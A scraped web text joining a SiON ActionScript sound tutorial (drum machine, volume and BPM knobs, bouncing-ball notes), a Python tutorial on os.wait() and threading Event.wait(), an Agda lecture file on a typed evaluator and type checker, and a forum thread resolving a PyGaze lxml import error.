You can define your own sound object by extending the SoundObject class and implementing everything you need. The SiON library has some built-in classes that extend SoundObject to implement different features, such as MMLPlayer (used to play an MML string with control over the played tracks), PatternSequencer (which provides a simple one-track pattern player) and MultiTrackSoundObject (the base class for SoundObjects that use multiple tracks).
To keep it simple we won't create a custom sound object; we'll use one already existing in SiON. There is an interesting class, DrumMachine, which provides independent bass drum, snare drum and hi-hat cymbal tracks. It is not a direct descendant of the SoundObject class, but I find it better suited for this tutorial.
Step 14: DrumMachine
As I've said before, the DrumMachine class is a MultiTrackSoundObject, which in turn is a descendant of the SoundObject class.

DrumMachine provides three main tracks: bass, hi-hat and snare. All these tracks can be controlled independently, meaning that you can change properties like volume, voices or patterns on each without affecting the others.
First let's add two new variables to our Main class:
private var _drumsToggler:PushButton;
private var _drums:DrumMachine;
The first is a button used to start and stop the drums; the second is the drum machine itself.
Now add the addDrums() method, which creates the DrumMachine object and the button that toggles it on and off.
private function addDrums():void {
    _drums = new DrumMachine();
    _drumsToggler = new PushButton(this, 10, 35, "Drums OFF", toggleDrums);
    _drumsToggler.toggle = true;
}
Also we need to add the handler to the button:
private function toggleDrums(e:Event):void {
    _drumsToggler.label = _drumsToggler.selected ? "Drums ON" : "Drums OFF";
    if (_drumsToggler.selected)
        _drums.play();
    else
        _drums.stop();
}
And last but not least, call the addDrums() method at the end of the Main class constructor.
If you run the code now you should see a new button. Click it and you will hear the DrumMachine playing. Neat, isn't it?
Step 15: Independent Volume
As I've said before, each track in a MultiTrackSoundObject (like DrumMachine) can be controlled independently of the others. To demonstrate this, we'll change the volume of each track of the DrumMachine object created earlier.
Let's start by adding some knobs for the volume, using the minimalcomps Knob class. For this we're going to create a new class called DrumsVolume.
package {
    import com.bit101.components.Knob;
    import flash.display.Sprite;
    import flash.events.Event;

    public class DrumsVolume extends Sprite {
        private var _bassKnob:Knob;
        private var _snareKnob:Knob;
        private var _hihatKnob:Knob;

        public function DrumsVolume() {
            addBassKnob();
            addSnareKnob();
            addHiHatKnob();
        }

        private function addBassKnob():void {
            _bassKnob = new Knob(this, 15, 0, "Bass vol.", onChange);
            _bassKnob.radius = 10;
            _bassKnob.labelPrecision = 0;
            _bassKnob.value = 100;
        }

        private function addSnareKnob():void {
            _snareKnob = new Knob(this, 15, _bassKnob.y + _bassKnob.height + 5, "Snare vol.", onChange);
            _snareKnob.radius = 10;
            _snareKnob.labelPrecision = 0;
            _snareKnob.value = 100;
        }

        private function addHiHatKnob():void {
            _hihatKnob = new Knob(this, 15, _snareKnob.y + _snareKnob.height + 5, "Hi-Hat vol.", onChange);
            _hihatKnob.radius = 10;
            _hihatKnob.labelPrecision = 0;
            _hihatKnob.value = 100;
        }

        public function get bassVol():Number {
            return _bassKnob.value / 100;
        }

        public function get snareVol():Number {
            return _snareKnob.value / 100;
        }

        public function get hihatVol():Number {
            return _hihatKnob.value / 100;
        }

        private function onChange(e:Event):void {
            dispatchEvent(new Event(Event.CHANGE));
        }
    }
}
In this class we simply create three knobs (one for each track) and dispatch a CHANGE event when a knob is turned. There are also three getters to retrieve the value of each volume knob.
Step 16: Setting the Volume
Now, back in the Main class, add a new variable called _drumsVolume and add the addDrumsVolume() method:
private var _drumsVolume:DrumsVolume;

private function addDrumsVolume():void {
    _drumsVolume = new DrumsVolume();
    _drumsVolume.addEventListener(Event.CHANGE, onVolumeChange);
    _drumsVolume.x = 5;
    _drumsVolume.y = _drumsToggler.y + _drumsToggler.height + 5;
    addChild(_drumsVolume);
}
As you can see, we add a listener to the DrumsVolume object for CHANGE events, so we need to add the handler as well.
private function onVolumeChange(e:Event):void {
    _drums.bassVolume = _drumsVolume.bassVol;
    _drums.snareVolume = _drumsVolume.snareVol;
    _drums.hihatVolume = _drumsVolume.hihatVol;
}
And finally, update the constructor of the Main class to call addDrumsVolume():
public function Main():void {
    _driver = new SiONDriver();
    _s1 = _driver.compile('l8 cdefgab<c');
    _s2 = _driver.compile('l8 o6co5bagfedc');
    _driver.play();
    addSoundButtons();
    addSelector();
    addDrums();
    addDrumsVolume();
}
Run the project and play with the knobs. Be sure to turn on the DrumMachine to hear how each track's volume changes.
Step 17: Effectors
SoundObjects are useful for yet another purpose: you can add effectors to them in order to obtain different sound effects. This way you can obtain effects like reverb, distortion, stereo chorus, auto pan, delay and many others.

You can find a complete list of built-in effectors in the org.si.sion.effector package. Of course, you can also make your own custom effectors by extending the SiEffectBase class.

To add one effector (or more), simply set them using the effectors property of the SoundObject instance.

In our case, if we wanted to use a distortion effect and an auto pan effect on the drums, we would do so like this:
_drums.effectors = [new SiEffectDistortion(), new SiEffectAutoPan()];
To remove all effectors from the SoundObject, simply pass in an empty array.
_drums.effectors = [];
Step 18: Playback Speed
There might be a case where you need to dynamically change the playback speed of all sounds played within SiON (e.g. in a game where you enter slow-motion mode).

To change the playback speed you modify a property called bpm (which stands for beats per minute). This is a property of the SiONDriver class and acts as a global modifier for all sounds played within SiON.
Let's add a knob to modify this property. First define a new private variable in the Main class named _bpmKnob.
private var _bpmKnob:Knob;
Next we'll create a method to add the knob and attach an event handler to it.
private function addBPMKnob():void {
    _bpmKnob = new Knob(this, 70, _drumsVolume.y + 10, "BPM", changeMaster);
    _bpmKnob.minimum = 48;
    _bpmKnob.maximum = 256;
    _bpmKnob.labelPrecision = 0;
    _bpmKnob.value = _driver.bpm;
}

private function changeMaster(e:Event):void {
    if (e.target == _bpmKnob)
        _driver.bpm = _bpmKnob.value;
}
As you can see, in the event handler we simply check whether the bpm knob has been turned and set the master bpm accordingly.

Run the code and give it a try. Turn on the drum machine or play one of the two sounds to hear how the bpm affects playback.
Note: Don't forget to call the addBPMKnob() method at the end of the Main class constructor.
Step 19: Master Volume
As with the bpm, you can change the volume of all sounds playing in SiON using the driver's volume property.

We're going to add another knob to serve as a master volume control.
private var _volumeKnob:Knob;
The addVolumeKnob() method instantiates the volume knob and configures it.
private function addVolumeKnob():void {
    _volumeKnob = new Knob(this, 70, _bpmKnob.y + _bpmKnob.height + 10, "Volume", changeMaster);
    _volumeKnob.labelPrecision = 0;
    _volumeKnob.value = _driver.volume * 100;
}
As seen above, the volume knob uses the same changeMaster() event handler to change the volume, so we need to add one more line to the handler:
private function changeMaster(e:Event):void {
    if (e.target == _bpmKnob)
        _driver.bpm = _bpmKnob.value;
    if (e.target == _volumeKnob)
        _driver.volume = _volumeKnob.value / 100;
}
Note: The value of the volume knob is divided by 100 because the volume property of the SiONDriver class takes a value from 0 to 1.
Also add the following code as the last line in the constructor:
addVolumeKnob();
Step 20: Panning
Currently SiON supports only one-channel or two-channel output. If you're using two-channel output (like headphones or dual speakers, the default when instantiating the SiONDriver), you can pan the sound so that you hear it in one channel, in the other, or more in one than the other.

The SiONDriver class has a property called pan which can be used to pan all sound coming out of SiON. Let's add a pan control to our project.
First we'll use a horizontal slider to represent the pan controller.
private var _panController:HUISlider;
Then we'll use the addPanControl() method to create the slider and add it to the stage.
private function addPanControl():void {
    _panController = new HUISlider(this, _selector.x, _selector.y + _selector.height + 10, "Pan", panSound);
    _panController.minimum = -100;
    _panController.maximum = 100;
    _panController.labelPrecision = 0;
}
As you can see, the handler for the slider is panSound(), so let's add that one too.
private function panSound(e:Event):void {
    _driver.pan = _panController.value / 100;
}
In the handler we simply set the driver's pan property to the value of the slider divided by 100. The division is necessary because the pan property only takes values from -1 to 1.
Add the addPanControl() method call as the last line of the constructor, compile the code and give it a try.
Note: To better observe the difference you can use some headphones.
Step 21: Synchronizing
As I said at the beginning of the tutorial, SiON makes it very easy to sync sounds with display data.

The simplest way to sync sounds with display objects is by using the noteOn() method of the SiONDriver class.

So let's say you have a ball that bounces, and an event is fired when that ball hits the floor, roof or walls. You can add an event listener for that event, and in the event handler do something like this:
private function onBallHit(e:Event):void {
    _driver.noteOn(50, _presets["valsound.percus3"], 1);
}
This would play a percussion note when the ball hits something.
Of course, for the example above we've assumed that _driver is the SiONDriver instance and _presets is an instance of the SiONPresetVoice class.

Note: As with any other operation in SiON, you need the driver to be streaming in order for this to work (_driver.play() must have been called before).
Step 22: Integrating the Example
Now that you have an idea of how easy it is to sync sounds with display data, let's integrate the above example into our project.

We'll start by adding a new class called Ball, which will represent the moving object.
package {
    import flash.display.Sprite;

    public class Ball extends Sprite {
        public var vx:Number;
        public var vy:Number;

        public function Ball() {
            draw();
        }

        private function draw():void {
            graphics.clear();
            graphics.beginFill(0xffffff, 0.9);
            graphics.drawCircle(5, 5, 5);
            graphics.endFill();
        }
    }
}
In this class we simply draw a white circle with a diameter of 10px, and expose two public properties, vx and vy, which represent the velocities on each axis.
Step 23: Ball Container
Now that we have an object to move we'll create a container in order to specify some boundaries. When the ball hits these boundaries some short sound will be played. A rectangle shape will do just fine as a container.
Add a new class to the project called BallContainer:
package {
    import flash.display.Sprite;
    import org.si.sion.SiONDriver;
    import org.si.sion.utils.SiONPresetVoice;

    public class BallContainer extends Sprite {
        private var _balls:Array;
        private var _voices:SiONPresetVoice;
        private var _driver:SiONDriver;

        public function BallContainer() {
            _voices = new SiONPresetVoice();
            _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver();
            _driver.play();
            draw();
        }

        private function draw():void {
            graphics.beginFill(0, .3);
            graphics.lineStyle(1, 0, 0.6);
            graphics.drawRect(0, 0, 320, 170);
            graphics.endFill();
        }
    }
}
In this class we have an array called _balls (this will hold the instances of the created balls), an instance of the SiONDriver named _driver, and an instance of the SiONPresetVoice, namely the _voices variable.
In the constructor we simply instantiate the voice presets, after which we get the driver instance if it already exists (remember the note from Step 3 about how we can only create one instance of the SiON driver class at any given moment) or create a new one. We also start the driver with the play() method.
The draw() method simply draws the container's background and the walls.
Adding balls to the container
Now that the container is drawn we need to add some balls to it. The addBalls() method does just that, so go ahead and add it to the BallContainer class.
private function addBalls():void {
    _balls = [];
    for (var i:int = 0; i < 5; i++) {
        var b:Ball = new Ball();
        addChild(b);
        _balls.push(b);
        b.x = Math.random() * 310;
        b.y = Math.random() * 160;
    }
}
In this method a for-loop is used to create five balls and add them to the container at random positions.
Also add the following code just after the last line in the constructor:
addBalls();
Moving them
OK. Everything's fine so far. The last thing we need to add to our class to make it functional is an event listener for ENTER_FRAME events, where we move the balls.
First add the event listener in the constructor:
public function BallContainer() {
    _voices = new SiONPresetVoice();
    _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver();
    _driver.play();
    draw();
    addBalls();
    addEventListener(Event.ENTER_FRAME, onEnterFrame);
}
Then add the handler for this listener. (The exact boundary values and the note formula below are illustrative; the idea, as explained next, is to bounce each ball and derive the note from the ball's index.)

private function onEnterFrame(e:Event):void {
    var b:Ball;
    for (var i:int = 0; i < _balls.length; i++) {
        b = _balls[i];
        b.x += b.vx;
        b.y += b.vy;
        if (b.x <= 0 || b.x >= 310) {
            b.vx *= -1;
            _driver.noteOn(50 + i * 3, _voices["midi.chrom6"], 1);
        }
        if (b.y <= 0 || b.y >= 160) {
            b.vy *= -1;
            _driver.noteOn(50 + i * 3, _voices["midi.chrom6"], 1);
        }
    }
}
In the onEnterFrame() handler we use a for-loop to go through every ball and update its position. We also check whether a ball has hit a boundary using an if-statement, and if it has we use the noteOn() method to play a sound.

In the noteOn() method we've used the following parameters:

note - this represents the note to be played and is an integer from 0 to 127 (or C0 to B9). As you can see we get the appropriate note depending on the ball number (just to mix the notes and not have the same sound).

voice - this is the voice in which the note will be played. In our case a Xylophone is used (the midi.chrom6 voice).

length - this parameter represents the note length in 16th beats. If this is set to 0 the note will not be removed and will remain in memory (if you use a length of 0 you should use the noteOff() method in order to remove it).
Adding the container
Now that everything is set up let's make use of this container. Open the Main class and add a new private variable named _ballCont of type BallContainer.
We'll make use of another method (conveniently named addBallContainer()) to add the container to the stage.
private function addBallContainer():void {
    _ballCont = new BallContainer();
    addChild(_ballCont);
    _ballCont.x = 170;
    _ballCont.y = 80;
}
And also call this method from the constructor, after the existing setup calls:

    addVolumeKnob();
    addPanControl();
    addBallContainer();
Run the code and see how it works. When a ball hits a wall and changes direction a note should be played.
Step 24: Final Touch
Now, just as a final touch, we'll add some functionality to the ball container so that we can start and stop it.
package {
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.events.MouseEvent;
    import org.si.sion.SiONDriver;
    import org.si.sion.utils.Scale;
    import org.si.sion.utils.SiONPresetVoice;

    public class BallContainer extends Sprite {
        private var _balls:Array;
        private var _on:Boolean;
        private var _voices:SiONPresetVoice;
        private var _driver:SiONDriver;

        public function BallContainer() {
            _voices = new SiONPresetVoice();
            _driver = SiONDriver.mutex ? SiONDriver.mutex : new SiONDriver();
            _driver.play();
            draw();
            addBalls();
            addEventListener(MouseEvent.CLICK, onClick);
        }

        private function onClick(e:MouseEvent):void {
            if (_on) stop();
            else start();
        }

        // handler from Step 23 (boundary values and note formula are illustrative)
        private function onEnterFrame(e:Event):void {
            var b:Ball;
            for (var i:int = 0; i < _balls.length; i++) {
                b = _balls[i];
                b.x += b.vx;
                b.y += b.vy;
                if (b.x <= 0 || b.x >= 310) {
                    b.vx *= -1;
                    _driver.noteOn(50 + i * 3, _voices["midi.chrom6"], 1);
                }
                if (b.y <= 0 || b.y >= 160) {
                    b.vy *= -1;
                    _driver.noteOn(50 + i * 3, _voices["midi.chrom6"], 1);
                }
            }
        }

        private function draw():void {
            graphics.beginFill(0, .3);
            graphics.lineStyle(1, 0, 0.6);
            graphics.drawRect(0, 0, 320, 170);
            graphics.endFill();
        }

        private function addBalls():void {
            _balls = [];
            for (var i:int = 0; i < 5; i++) {
                var b:Ball = new Ball();
                addChild(b);
                _balls.push(b);
                b.x = Math.random() * 310;
                b.y = Math.random() * 160;
            }
        }

        public function start():void {
            var b:Ball;
            for (var i:int = 0; i < _balls.length; i++) {
                b = _balls[i];
                b.vx = (Math.random() * 10) - 5;
                b.vy = (Math.random() * 10) - 5;
            }
            _on = true;
            addEventListener(Event.ENTER_FRAME, onEnterFrame);
        }

        public function stop():void {
            _on = false;
            removeEventListener(Event.ENTER_FRAME, onEnterFrame);
        }
    }
}
As you can see I've highlighted the additions in the BallContainer class.
As a brief explanation, I've first added a boolean variable _on which keeps track of whether the movie is playing (balls are moving) or not. In the constructor I've changed the line that adds an event listener for ENTER_FRAME events to one for mouse CLICK events. Also, the MouseEvent handler named onClick() is used to start or stop the movie when the container is clicked.
Lastly, in the start() and stop() methods the ENTER_FRAME event listener is added and removed, respectively. Also, in the start() method we reset the velocities of each ball.
Conclusion
The SiON library is very useful when you need to use a lot of sounds (most often in games) but can't afford the extra SWF size or the time to load them. As you can see, it's not hard at all to create interesting sounds on the fly.
You can see many examples of cool implementations of the library at wonderfl.net. Also these examples are useful to learn more about other features in SiON.
I hope you enjoyed this tutorial, and thank you for reading!
Introduction to Python wait()
The Python wait() method makes a running process wait for another process (such as a child process) to complete its execution before resuming. This wait() method is provided by the os module; it lets a parent process synchronize with its child process, meaning the parent waits until the child finishes executing (i.e. until the child exits) and only then continues with its own execution. A method of the same name is also defined on the Event class in Python's threading module: it suspends execution of the current thread while the event's internal flag is false, and resumes it once the flag is set to true.
Working of wait() Method in Python
In this article, we will discuss the wait() method found in the os module of the Python programming language, invoked as os.wait(). The os.wait() function suspends the parent process until a child process has finished executing. In general, wait() is used whenever a process needs to pause until something happens, i.e. until some specified condition or mode is met.
In Python, the wait() function is defined in two different modules: the os module and the threading module. In the threading module, the Event class provides a wait() method that holds the current thread's execution until the event is set (or a timeout expires). The os module's version behaves analogously, but there it is the parent process that waits until the child completes its execution. In the sections below we cover both methods in detail with examples. In Python, the os.wait() function has the following syntax:
Syntax:
os.wait()
This call returns a tuple containing the child process's id together with a 16-bit integer that encodes the exit status. In this 16-bit integer, the low byte holds the number of the signal that killed the process (zero if it exited normally) and the high byte holds the exit status. The os.wait() function takes no parameters or arguments. Now let us see a simple example of this method:
Example #1
Code:
import os

print(" Program to demonstrate wait() method:")
print("\n")
print("Creating child process:")
pr = os.fork()
if pr == 0:
    print("Child process will print the numbers from the range 0 to 5")
    for i in range(0, 5):
        print("Child process printing the number %d" % (i))
    print("Child process with number %d exiting" % os.getpid())
    print("The child process is", (os.getpid()))
else:
    print("The parent process is now waiting")
    cpe = os.wait()
    print("Child process with number %d exited" % (cpe[0]))
    print("Parent process with number %d exiting after child has executed its process" % (os.getpid()))
    print("The parent process is", (os.getpid()))
Output:
The above program demonstrates the wait() method of the os module in Python. First, we import the os module. To create a child process we call the fork() method, and getpid() returns the id of the calling process. The program prints the numbers 0 to 4 from the child process, and while the child is printing, the parent process waits. Once the child that completed its execution has exited, the parent process exits as well.
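The 16-bit status word described above can also be decoded explicitly with os.WEXITSTATUS. This is a minimal POSIX-only sketch (not part of the original article) showing that the high byte really is the exit status:

```python
import os

pid = os.fork()
if pid == 0:
    # Child: exit immediately with status 7.
    os._exit(7)
else:
    child_pid, status = os.wait()
    # Low byte: signal number (0 here, since the child exited normally).
    # High byte: the exit status.
    print(child_pid == pid)          # True
    print(os.WEXITSTATUS(status))    # 7
    print(status >> 8)               # 7, the high byte decoded by hand
```
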
Now we will look at the other Python module that provides a wait() method: the threading module, which mainly includes mechanisms that allow synchronization of threads. Here wait() blocks the current thread until another thread sets the event (or an optional timeout expires). This method is found in the Event class of the threading module, so the syntax can be written as below:
First we need to import the Event class from the threading module, which can be done as follows:

from threading import Event

The method signature is:

wait(timeout=None)
The wait() method takes an optional timeout argument that specifies how long to wait; once the time runs out, the waiting thread is unblocked regardless. The method returns a boolean value: True if the internal flag was set (i.e. the thread was released) before the timeout, and False otherwise.
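The return-value behavior can be seen in a few lines (a minimal sketch, not from the original article, using only the standard library):

```python
import threading

ev = threading.Event()

# Nobody sets the event, so wait() runs out of time and returns False.
timed_out = ev.wait(timeout=0.1)
print(timed_out)   # False

# Set the flag from another thread shortly; wait() then returns True
# well before its generous 5 second timeout expires.
threading.Timer(0.05, ev.set).start()
released = ev.wait(timeout=5)
print(released)    # True
```

Note that a timed-out wait() does not raise an exception; you must check the returned flag yourself.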
So let us see a sample example of how the wait() method works in the threading module.
Example #2
import threading
import time

def hf(et_obj, timeout, n):
    print("Thread started, waiting for the event to set")
    print("\n")
    flag = et_obj.wait(timeout)
    if flag:
        print("The Event earlier was true, now moving forward")
    else:
        print("Time has run out, yet the event internal flag is still false.")
        print("Start executing thread without waiting for event to become false")
    print(n)
    print("\n")

if __name__ == '__main__':
    print("Start invoking the event")
    et_obj = threading.Event()
    t1 = threading.Thread(target=hf, args=(et_obj, 5, 17))
    t1.start()
    time.sleep(5)
    print("It will start generating the event")
    print("\n")
    et_obj.set()
    print("So the Event is now set to true.")
    print("Now threads can be released.")
    print()
Output:
In the above program, we demonstrate the wait() method with a timeout parameter, importing the threading module first. The worker thread calls wait() and blocks; if the timeout occurs before the flag is set, wait() returns False and the thread starts executing without waiting any longer for the event. If we want the thread to be released by the event instead, the main thread must set the flag in time: here it uses the sleep() method to pause for 5 seconds, then calls set(), which sets the internal flag to true and releases any waiting threads for further execution.
Conclusion
In this article, we saw that Python provides a module known as os (operating system) whose wait() function lets a parent process wait until its child has executed completely, and we saw how to use it with an example. We also saw that the threading module provides a wait() function that makes a thread wait until an event fires, again with an example.
Recommended Articles
This is a guide to Python wait(). Here we discuss the introduction and working of the wait() method in Python, along with different examples and their code implementation. You may also have a look at the following articles to learn more –
{- Computer Aided Formal Reasoning (G53CFR, G54CFR)
   Thorsten Altenkirch

   Lecture 13: Evaluator and type checker

   In this lecture we investigate an evaluator for a simple language of
   expressions over natural numbers and booleans. We first implement an
   untyped evaluator (which may fail and is slow) and then an evaluator
   for a typed language which will always succeed and is faster. To go
   from an untyped expression to a typed expression we implement a type
   checker. The type checker may also fail but this is early (before
   evaluation) and doesn't affect the efficiency of evaluations.
-}
module l13 where

open import Data.Nat
open import Data.Bool
open import Data.Maybe
open import Data.Product
open import Relation.Nullary
open import Relation.Binary.PropositionalEquality

{- an untyped language of expressions -}
infix 3 _≤E_
infix 4 _+E_

data Expr : Set where
  nat            : ℕ → Expr
  bool           : Bool → Expr
  _+E_           : Expr → Expr → Expr
  _≤E_           : Expr → Expr → Expr
  ifE_then_else_ : Expr → Expr → Expr → Expr

{- Examples of expressions: -}
e1 : Expr -- if 3 ≤ 4 then 4 + 1 else 0
e1 = ifE (nat 3) ≤E (nat 4) then (nat 4) +E (nat 1) else (nat 0)

e2 : Expr -- 3 ≤ 4 + 5
e2 = (nat 3) ≤E (nat 4) +E (nat 5)

e3 : Expr -- (3 ≤ 4) + 5
e3 = ((nat 3) ≤E (nat 4)) +E (nat 5)

{- The result of evaluating an expression is a value -}
data Val : Set where
  nat  : ℕ → Val
  bool : Bool → Val

{- To accommodate errors we introduce the Maybe monad. A Monad M is an
   operation on Sets such that M A is the type of computations over A.
   In the case of Maybe a computation is something that may go wrong
   (i.e. returns nothing). Each monad comes with two functions:

     return : {A : Set} → A → M A
   turns a value into a (trivial) computation.

     _>>=_ : {A B : Set} → M A → (A → M B) → M B
   (bind) m >>= f runs first the computation m and if it returns a
   value runs f on it. The effects are a combination of running both
   computations.
-}

-- for Maybe return is just (no error)
return : {A : Set} → A → Maybe A
return a = just a

infix 2 _>>=_

-- bind does error propagation
_>>=_ : {A B : Set} → Maybe A → (A → Maybe B) → Maybe B
just a  >>= f = f a
nothing >>= f = nothing

{- To implement the evaluator we implement some convenience
   functions. -}

{- Addition of two values has to check whether the values are indeed
   numbers -}
_+v_ : Val → Val → Maybe Val
nat m +v nat n = return (nat (m + n))
_     +v _     = nothing

{- dec2bool coerces decidability into bool by forgetting the
   evidence. -}
dec2bool : {A : Set} → Dec A → Bool
dec2bool (yes p) = true
dec2bool (no ¬p) = false

{- This is used to implement ≤ for values. As with +v, this has to
   check whether the arguments are numbers. -}
_≤v_ : Val → Val → Maybe Val
nat m ≤v nat n = return (bool (dec2bool (m ≤? n)))
_     ≤v _     = nothing

{- if-then-else for values. May return an error if the first argument
   is not a boolean. -}
ifV_then_else_ : Val → Val → Val → Maybe Val
ifV bool b then v else v' = return (if b then v else v')
ifV _      then _ else _  = nothing

{- The evaluator. We use Scott-brackets (⟦ = \[[, ⟧ = \]]) as it is
   tradition to mark the borderline between syntax and semantics.
   Evaluating an expression may return a value or fail. -}
⟦_⟧ : Expr → Maybe Val
⟦ nat n ⟧  = return (nat n)
⟦ bool b ⟧ = return (bool b)
⟦ e +E e' ⟧ =
  ⟦ e ⟧  >>= λ v →
  ⟦ e' ⟧ >>= λ v' →
  v +v v'
{- In Haskell we would use "do" syntax:
     do v  <- ⟦ e ⟧
        v' <- ⟦ e' ⟧
        v +v v'
-}
⟦ e ≤E e' ⟧ =
  ⟦ e ⟧  >>= λ v →
  ⟦ e' ⟧ >>= λ v' →
  v ≤v v'
⟦ ifE e then e' else e'' ⟧ =
  ⟦ e ⟧   >>= λ v →
  ⟦ e' ⟧  >>= λ v' →
  ⟦ e'' ⟧ >>= λ v'' →
  ifV v then v' else v''

{- Evaluating the examples: -}
v1 : Maybe Val -- just (nat 5)
v1 = ⟦ e1 ⟧

v2 : Maybe Val -- just (bool true)
v2 = ⟦ e2 ⟧

v3 : Maybe Val
v3 = ⟦ e3 ⟧ -- nothing

{- We do everything again but this time for a typed language. -}

{- the types -}
data Ty : Set where
  nat  : Ty
  bool : Ty

{- typed values -}
data TVal : Ty → Set where
  nat  : ℕ → TVal nat
  bool : Bool → TVal bool

{- typed expressions -}
data TExpr : Ty → Set where
  nat            : ℕ → TExpr nat
  bool           : Bool → TExpr bool
  _+E_           : TExpr nat → TExpr nat → TExpr nat
  _≤E_           : TExpr nat → TExpr nat → TExpr bool
  ifE_then_else_ : {σ : Ty} → TExpr bool → TExpr σ → TExpr σ → TExpr σ

{- the typed evaluator doesn't need to use the Maybe monad because it
   will never fail. -}
⟦_⟧T : {σ : Ty} → TExpr σ → TVal σ
⟦ nat n ⟧T  = nat n
⟦ bool b ⟧T = bool b
⟦ e +E e' ⟧T with ⟦ e ⟧T | ⟦ e' ⟧T
... | nat m | nat n = nat (m + n)
⟦ e ≤E e' ⟧T with ⟦ e ⟧T | ⟦ e' ⟧T
... | nat m | nat n = bool (dec2bool (m ≤? n))
⟦ ifE e then e' else e'' ⟧T with ⟦ e ⟧T
... | bool b = if b then ⟦ e' ⟧T else ⟦ e'' ⟧T

{- But what to do if we have just got an untyped expression (maybe
   read from a file)? We use a type checker to lift an untyped
   expression to an equivalent typed expression (or fail). -}

{- A forgetful map from typed expressions to untyped expressions -}
⌊_⌋ : {σ : Ty} → TExpr σ → Expr
⌊ nat n ⌋  = nat n
⌊ bool b ⌋ = bool b
⌊ e +E e' ⌋ = ⌊ e ⌋ +E ⌊ e' ⌋
⌊ e ≤E e' ⌋ = ⌊ e ⌋ ≤E ⌊ e' ⌋
⌊ ifE e then e' else e'' ⌋ = ifE ⌊ e ⌋ then ⌊ e' ⌋ else ⌊ e'' ⌋

{- equality of types is clearly decidable -}
_≡Ty?_ : (σ τ : Ty) → Dec (σ ≡ τ)
nat  ≡Ty? nat  = yes refl
nat  ≡Ty? bool = no (λ ())
bool ≡Ty? nat  = no (λ ())
bool ≡Ty? bool = yes refl

{- The result of checking an expression e is a record containing: -}
record Check (e : Expr) : Set where
  constructor check
  field
    σ    : Ty          -- a type
    te   : TExpr σ     -- a typed expression
    te≡e : ⌊ te ⌋ ≡ e  -- if we forget the types we recover e

{- This is the first time we use records in Agda. Look up the
   reference manual for a description of records in Agda. -}
open Check

{- Records also use modules which hide the projection functions. By
   opening it we have direct access to the projection functions
   corresponding to the field names. E.g. we have

     σ  : Check e → Ty
     te : (c : Check e) → TExpr (σ c)
-}

{- We implement type inference by recursion over the expression. -}
infer : (e : Expr) → Maybe (Check e)
infer (nat n)  = just (check nat (nat n) refl)
infer (bool b) = just (check bool (bool b) refl)
{- To infer a type for e + e' we recursively infer types for e and e'
   (which may fail) and make sure that they are nat, in which case we
   return a typed expression of type nat. -}
infer (e +E e') with infer e | infer e'
infer (.(⌊ te ⌋) +E .(⌊ te' ⌋)) | just (check nat te refl) | just (check nat te' refl) = just (check nat (te +E te') refl)
infer (e +E e') | _ | _ = nothing
{- ≤ uses the same technique -}
infer (e ≤E e') with infer e | infer e'
infer (.(⌊ te ⌋) ≤E .(⌊ te' ⌋)) | just (check nat te refl) | just (check nat te' refl) = just (check bool (te ≤E te') refl)
infer (e ≤E e') | _ | _ = nothing
{- if-then-else also has to make sure that both branches have the same
   type, which is the type of the result. -}
infer (ifE e then e' else e'') with infer e | infer e' | infer e''
infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check σ' te'' refl) with σ ≡Ty? σ'
infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check .σ te'' refl) | yes refl = just (check σ (ifE te then te' else te'') refl)
infer (ifE .(⌊ te ⌋) then .(⌊ te' ⌋) else .(⌊ te'' ⌋)) | just (check bool te refl) | just (check σ te' refl) | just (check σ' te'' refl) | no _ = nothing
infer (ifE e then e' else e'') | _ | _ | _ = nothing

{- A safe evaluator -}

{- We can also forget the types of typed values -}
⌊_⌋v : {σ : Ty} → TVal σ → Val
⌊ nat n ⌋v  = nat n
⌊ bool b ⌋v = bool b

{- We implement a safe evaluator which has the same type as the
   untyped evaluator. It exploits the type checker to first produce a
   typed expression (or fail) and then runs the fast and safe typed
   evaluator. -}
⟦_⟧s : Expr → Maybe Val
⟦ e ⟧s = infer e >>= λ c → return (⌊ ⟦ Check.te c ⟧T ⌋v)

{- For our examples that safe evaluator produces the same results: -}
v1' : Maybe Val
v1' = ⟦ e1 ⟧s

v2' : Maybe Val
v2' = ⟦ e2 ⟧s

v3' : Maybe Val
v3' = ⟦ e3 ⟧s

{- Is this always the case ? -}
"No module named lxml.etree" error in controlling GP3
Hi Everyone
I'm trying to control Gaze Point 3 with Pygaze (WinPython-PyGaze-0.6.0) and the latest version of GazePoint Controller on Win10 (64bit).
The problem is...
When I try to run "SlideShow" example, "No module named lxml.etree" error is thrown.
I re-installed lxml and freetype-py to no avail.
Could anyone tell me how to fix this problem?
The full error message is pasted below.
Best regards
Hiro
FreeType import Failed: Freetype library not found
Traceback (most recent call last):
File "experiment.py", line 30, in <module>
tracker = EyeTracker(disp)
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\eyetracker.py", line 118, in __init__
from pygaze._eyetracker.libopengaze import OpenGazeTracker
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\_eyetracker\libopengaze.py", line 41, in <module>
from opengaze import OpenGazeTracker as OpenGaze
File "C:\Users\DoiH\Desktop\WinPython-PyGaze-0.6.0\python-2.7.3\lib\site-packages\pygaze\_eyetracker\opengaze.py", line 14, in <module>
import lxml.etree
ImportError: No module named lxml.etree
0.8818 WARNING Movie2 stim could not be imported and won't be available
1.0676 WARNING TextBox stim could not be imported and won't be available.
1.0677 WARNING TextBox Font Manager Found No Fonts.
1.0680 WARNING Monitor specification not found. Creating a temporary one...
1.0683 WARNING User requested fullscreen with size [1024 768], but screen is actually [1280, 720]. Using actual size
Solved.
Sorry for bothering you all.
Best
Hiro
For future reference, the solution is to install the lxml library by opening a terminal (command prompt) and running the following command:

pip install lxml
For more info, see: | https://forum.cogsci.nl/discussion/5107/no-module-named-lxml-etree-error-in-controlling-gp3 | CC-MAIN-2020-45 | refinedweb | 301 | 53.98 |
Using Device-Independent Bitmaps in WinCE Development
Device-Independent Bitmaps
